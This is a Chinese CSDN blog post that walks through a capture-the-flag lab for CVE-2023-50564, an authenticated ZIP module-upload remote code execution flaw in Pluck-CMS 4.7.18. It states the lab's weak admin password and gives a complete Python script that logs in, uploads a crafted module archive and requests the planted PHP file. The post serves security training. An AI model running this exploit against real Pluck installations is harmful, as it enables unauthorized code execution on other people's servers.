【春秋云境】CVE-2023-50564 Pluck-CMS v4.7.18 后台文件上传漏洞一把梭

已于 2024-04-03 16:08:56 修改
阅读量347 收藏
点赞数 3
分类专栏: web安全 文章标签: 安全漏洞
于 2024-04-03 15:42:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hmx404/article/details/137347962
版权

靶场介绍

Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
这个靶场后台密码是admin123,如果你想试试,可以再继续试一下

开启靶场

在这里插入图片描述
POC脚本

## pip install requests_toolbelt

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder


url="http://eci-2ze5onkv4tv72l3rr3e9.cloudeci1.ichunqiu.com/"
file_path ="miri.zip"

login_url = url+"/login.php"
upload_url = url+"/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin123","bogus": "","submit": "Log in"}

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Login account")

 
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


rce_url=url+"/data/modules/mirabbas/miri.php"
rce=requests.get(rce_url)
print(rce.text)

得到flag

帮助你了就不要取消关注了,感谢感谢。

HMX404
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Pluck 代码问题漏洞( CVE-2022-26965)
千寻的博客
12-01 1891
Pluck-CMS-Pluck-4.7.16 后台RCE
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 2552
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
春秋云镜 CVE-2023-50564
qq274575499的博客
04-28 507
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
春秋云境CVE-2023-50564
shr592833253的博客
04-11 257
靶场介绍:Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。点击manage modules,随后进入Install a module...然后将文件夹打包为zip的后缀压缩包,切记,不要直接改文件后缀名!我们需构造一个命令执行文件,然后将其放到任意命名的文件夹中,如下图所示。进入靶场后点击admin,来到管理员登录界面。尝试弱口令,最终发现密码位admin123。可以看见文件上传的地方。
Pluck Cms文件上传结合命令执行复现
晚安這個未知的世界
03-14 1053
漏洞影响 Pluck CMS Pluck CMS <=4.7.10 安装模版+文件包含导致任意命令执行 很多CMS都会在安装模版的时候getshell,那么这里笔者也发现了类似的漏洞。 在阅读自己下载下来得源码之后看到 目录下有.htaccess文件,直接把php设置为不可解析,所以无法直接访问 所以就想到需要找一个位置对其进行包含,来达到执行的目的。 首先看到admin.php中关于theme的部分 跟进 data/inc/theme.php,发现调用了get_themes()方法 跟进 fu
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 428
Pluck-CMS-Pluck-4.7.16 后台RCE。
春秋云境CVE-2022-26965
一只爱吃橙子的羊
11-29 2428
Pluck-CMS-Pluck-4.7.16 后台RCE
春秋云境CVE-2022-26965(后台RCE)
m0_65712192的博客
04-21 1438
Pluck-CMS-Pluck-4.7.16 后台RCE
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
华为OD机试D卷 - 在字符串中找出连续最长的数字串(含“+-”号) - 免费看解析和代码.html
05-10
私信博主免费获取真题解析以及代码
node-v6.11.0-linux-armv7l.tar.xz
最新发布
05-10
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
23-22.渗透测试-敏感信息收集工具汇总.mp4
05-10
23-22.渗透测试-敏感信息收集工具汇总.mp4
ZCANPRO安装包ZCANPRO-Setup-V2.2.6(20230327)
05-10
ZCANPRO安装包
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值